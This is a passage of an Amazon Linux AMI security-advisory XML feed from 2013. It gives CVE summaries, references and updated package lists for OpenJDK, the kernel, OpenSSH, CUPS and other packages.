</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3411" title="" id="CVE-2012-3411" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0277.html" title="" id="RHSA-2013:0277" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dnsmasq" version="2.48" release="13.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-2.48-13.9.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-utils" version="2.48" release="13.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-utils-2.48-13.9.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.48" release="13.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-debuginfo-2.48-13.9.amzn1.x86_64.rpm</filename></package><package name="dnsmasq" version="2.48" release="13.9.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-2.48-13.9.amzn1.i686.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.48" release="13.9.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-debuginfo-2.48-13.9.amzn1.i686.rpm</filename></package><package name="dnsmasq-utils" version="2.48" release="13.9.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-utils-2.48-13.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-162</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-162: important priority package update for java-1.7.0-openjdk</title><issued date="2013-03-02 16:49:00" /><updated date="2014-09-15 22:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1486:
Multiple improper permission check issues were discovered in the JMX and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1485:
An improper permission check issue was discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2013-0169:
It was discovered that OpenJDK leaked timing information when decrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL server as a padding oracle.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0169" title="" id="CVE-2013-0169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1485" title="" id="CVE-2013-1485" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1486" title="" id="CVE-2013-1486" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0275.html" title="" id="RHSA-2013:0275" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.7.1.20.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.7.1.20.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.7.1.20.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.7.1.20.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.7.1.20.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.7.1.20.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.7.1.20.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.7.1.20.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.7.1.20.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.7.1.20.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.7.1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-163</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-163: important priority package update for java-1.6.0-openjdk</title><issued date="2013-03-02 16:50:00" /><updated date="2014-09-15 22:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1486:
An improper permission check issue was discovered in the JMX component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2013-0169:
It was discovered that OpenJDK leaked timing information when decrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL server as a padding oracle.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0169" title="" id="CVE-2013-0169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1486" title="" id="CVE-2013-1486" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0273.html" title="" id="RHSA-2013:0273" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-56.1.11.8.51.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="56.1.11.8.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-56.1.11.8.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-164</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-164: medium priority package update for axis</title><issued date="2013-03-02 16:50:00" /><updated date="2014-09-15 22:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5784:
Apache Axis did not verify that the server hostname matched the domain name in the subject's Common Name (CN) or subjectAltName field in X.509 certificates. This could allow a man-in-the-middle attacker to spoof an SSL server if they had a certificate that was valid for any domain name.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5784" title="" id="CVE-2012-5784" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0269.html" title="" id="RHSA-2013:0269" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="axis-manual" version="1.2.1" release="7.3.11.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-manual-1.2.1-7.3.11.amzn1.noarch.rpm</filename></package><package name="axis" version="1.2.1" release="7.3.11.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-1.2.1-7.3.11.amzn1.noarch.rpm</filename></package><package name="axis-javadoc" version="1.2.1" release="7.3.11.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-javadoc-1.2.1-7.3.11.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-165</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-165: medium priority package update for openssh</title><issued date="2013-03-02 16:51:00" /><updated date="2014-09-15 22:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5536:
Due to the way the pam_ssh_agent_auth PAM module was built in Red Hat Enterprise Linux 6, the glibc's error() function was called rather than the intended error() function in pam_ssh_agent_auth to report errors. As these two functions expect different arguments, it was possible for an attacker to cause an application using pam_ssh_agent_auth to crash, disclose portions of its memory or, potentially, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5536" title="" id="CVE-2012-5536" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0519.html" title="" id="RHSA-2013:0519" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-clients" version="5.3p1" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-5.3p1-84.20.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="5.3p1" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-5.3p1-84.20.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="5.3p1" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-5.3p1-84.20.amzn1.x86_64.rpm</filename></package><package name="openssh" version="5.3p1" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-5.3p1-84.20.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="5.3p1" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-5.3p1-84.20.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="84.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-84.20.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="5.3p1" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-5.3p1-84.20.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-84.20.amzn1.i686.rpm</filename></package><package name="openssh-server" version="5.3p1" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-5.3p1-84.20.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="5.3p1" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-5.3p1-84.20.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="5.3p1" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-5.3p1-84.20.amzn1.i686.rpm</filename></package><package name="openssh" version="5.3p1" release="84.20.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-5.3p1-84.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-166</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-166: medium priority package update for kernel</title><issued date="2013-03-02 16:54:00" /><updated date="2014-09-15 22:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-0871:
* A race condition was found in the way the Linux kernel's ptrace implementation handled PTRACE_SETREGS requests when the debuggee was woken due to a SIGKILL signal instead of being stopped. A local, unprivileged user could use this flaw to escalate their privileges.
CVE-2012-4530:
868285:
CVE-2012-4530 kernel: stack disclosure in binfmt_script load_script()
* A memory disclosure flaw was found in the way the load_script() function in the binfmt_script binary format handler handled excessive recursions. A local, unprivileged user could use this flaw to leak kernel stack memory to user-space by executing specially-crafted scripts.
CVE-2012-4461:
* A flaw was found in the way the KVM (Kernel-based Virtual Machine) subsystem handled guests attempting to run with the X86_CR4_OSXSAVE CPU feature flag set. On hosts without the XSAVE CPU feature, a local, unprivileged user could use this flaw to crash the host system. (The "grep --color xsave /proc/cpuinfo" command can be used to verify if your system has the XSAVE CPU feature.)
CVE-2012-4398:
* It was found that a deadlock could occur in the Out of Memory (OOM) killer. A process could trigger this deadlock by consuming a large amount of memory, and then causing request_module() to be called. A local, unprivileged user could use this flaw to cause a denial of service (excessive memory consumption).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4398" title="" id="CVE-2012-4398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4461" title="" id="CVE-2012-4461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4530" title="" id="CVE-2012-4530" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0871" title="" id="CVE-2013-0871" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0223.html" title="" id="RHSA-2013:0223" type="redhat" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0567.html" title="" id="RHSA-2013:0567" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.39" release="6.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.39-6.88.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.39" release="6.88.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.39-6.88.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.2.39" release="6.88.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.39-6.88.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-167</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-167: important priority package update for java-1.6.0-openjdk</title><issued date="2013-03-14 22:03:00" /><updated date="2014-09-15 22:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1493:
It was discovered that the 2D component did not properly reject certain malformed images. Specially-crafted raster parameters could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges.
CVE-2013-0809:
An integer overflow flaw was found in the way the 2D component handled certain sample model instances. A specially-crafted sample model instance could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0809" title="" id="CVE-2013-0809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493" title="" id="CVE-2013-1493" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0605.html" title="" id="RHSA-2013:0605" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-57.1.11.9.52.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="57.1.11.9.52.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-57.1.11.9.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-168</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-168: important priority package update for java-1.7.0-openjdk</title><issued date="2013-03-14 22:03:00" /><updated date="2014-09-15 22:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1493:
It was discovered that the 2D component did not properly reject certain malformed images. Specially-crafted raster parameters could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges.
CVE-2013-0809:
An integer overflow flaw was found in the way the 2D component handled certain sample model instances. A specially-crafted sample model instance could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0809" title="" id="CVE-2013-0809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493" title="" id="CVE-2013-1493" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0602.html" title="" id="RHSA-2013:0602" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.8.0.22.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.8.0.22.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.8.0.22.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.8.0.22.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.8.0.22.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.8.0.22.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.8.0.22.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.8.0.22.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.8.0.22.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.8.0.22.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.8.0.22.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.8.0.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-169</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-169: medium priority package update for jakarta-commons-httpclient</title><issued date="2013-03-14 22:04:00" /><updated date="2014-09-15 22:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5783:
The Jakarta Commons HttpClient component did not verify that the server hostname matched the domain name in the subject's Common Name (CN) or subjectAltName field in X.509 certificates. This could allow a man-in-the-middle attacker to spoof an SSL server if they had a certificate that was valid for any domain name.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5783" title="" id="CVE-2012-5783" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0270.html" title="" id="RHSA-2013:0270" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jakarta-commons-httpclient-javadoc" version="3.1" release="12.6.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-javadoc-3.1-12.6.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient" version="3.1" release="12.6.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-3.1-12.6.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient-manual" version="3.1" release="12.6.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-manual-3.1-12.6.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient-demo" version="3.1" release="12.6.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-demo-3.1-12.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-170</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-170: medium priority package update for cups</title><issued date="2013-03-14 22:04:00" /><updated date="2014-09-15 22:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5519:
It was discovered that CUPS administrative users (members of the SystemGroups groups) who are permitted to perform CUPS configuration changes via the CUPS web interface could manipulate the CUPS configuration to gain unintended privileges. Such users could read or write arbitrary files with the privileges of the CUPS daemon, possibly allowing them to run arbitrary code with root privileges.
